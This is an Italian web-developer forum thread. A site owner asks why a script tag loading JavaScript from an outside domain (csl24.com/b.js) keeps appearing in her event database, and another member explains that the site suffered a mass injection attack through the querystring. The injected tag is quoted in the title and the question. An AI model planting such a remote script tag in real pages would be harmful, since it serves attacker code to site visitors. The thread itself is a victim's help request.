Visualizzazione dei risultati da 1 a 2 su 2
  1. #1
    Utente di HTML.it L'avatar di Ashry
    Registrato dal
    Jul 2002
    Messaggi
    586

    problema inserimento <script src=http://www.csl24.com/b.js></script> in DB

    Ciao a tutti ho un problema con un DB, tramite form inserisco delle news in un database

    Form:
    Codice PHP:
            <form onSubmit="return CheckEventi();" method="post" name="Eventi">
            <
    tr>
              <
    td>Evento:</td>
              <
    td><input name="_evento" type="text" id="_evento" style="width:250px;"></td>
            </
    tr>
            <
    tr>
              <
    td class="td1"Data: </td>
              <
    td>
                <
    select name="_giorno">
                <%
                for 
    giorni=1 to 31 
                
    %>
                <
    option value="<%=Right("00" & giorni, 2)%>"><%=ctInd%></option>
                <%
                
    next
                
    %>
                </
    select>
                 
                <
    select name="_mese">
                <%
                
    setlocale("it")
                for 
    ctInd=1 to 12 
                
    %>
                <
    option value="<%=Right("00" & ctInd, 2)%>"><%= monthName(ctInd)%></option>
                <%
                
    next
                
    %> 
                </
    select>
                 
                <
    select name="_anno">
                <%
                for 
    ctInd=datePart("yyyy",nowto datePart("yyyy",now) + 10 step +1
                
    %>
                <
    option value="<%=ctInd%>"><%=ctInd%></option>
                <%
                
    next
                
    %> 
                </
    select>
             </
    td>
            </
    tr>
            <
    tr>
              <
    td>Organizzatore:</td>
              <
    td><input name="_organizzatore" type="text" id="_organizztore" style="width:250px;"></td>
            </
    tr>
            <
    tr>
              <
    td>Località:</td>
              <
    td><input name="_luogo" type="text" id="_luogo" style="width:250px;" maxlength="250"></td>
            </
    tr>
            <
    tr>
              <
    td>E-Mail</td>
              <
    td><input name="_email" type="text" id="_email" style="width:250px;"></td>
            </
    tr>
            <
    tr>
              <
    td>Descrizione:</td>
              <
    td><textarea name="_descrizione" style="width:250px; "></textarea></td>
            </
    tr>
            <
    tr>
              <
    td>Evento del mese</td>
              <
    td>
                <
    select name="_focus">
                <
    option value="Y">SI</option>
                <
    option value="N">NO</option>
                </
    select>
              </
    td>
            </
    tr>
            <
    tr>
            <
    td></td>
            <
    td><input name="submit" type="submit" value="Insert &raquo;&raquo;"></td>
            </
    tr>
            </
    form
    nella pagina di inserimento recupero i dati e li metto in una tabella ma accanto alle date mi ritrovo quel JS sapere che roba è?

    Grazie

    Ciao
    Cinzia

  2. #2
    Utente di HTML.it L'avatar di willybit
    Registrato dal
    May 2001
    Messaggi
    4,367
    Ciao Ashry,

    usi SQL Server?
    Mi spiace dirtelo ma il tuo sito ha subito un html injection
    Praticamente ti hanno scritto nel databse sfruttando del codice passato tramite querystring.
    Molto probabilmente tutti i campi testuali del tuo db sono stati modificati. Ultimamente è successo molto spesso (anche a miei siti) senti qua cosa dicono

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.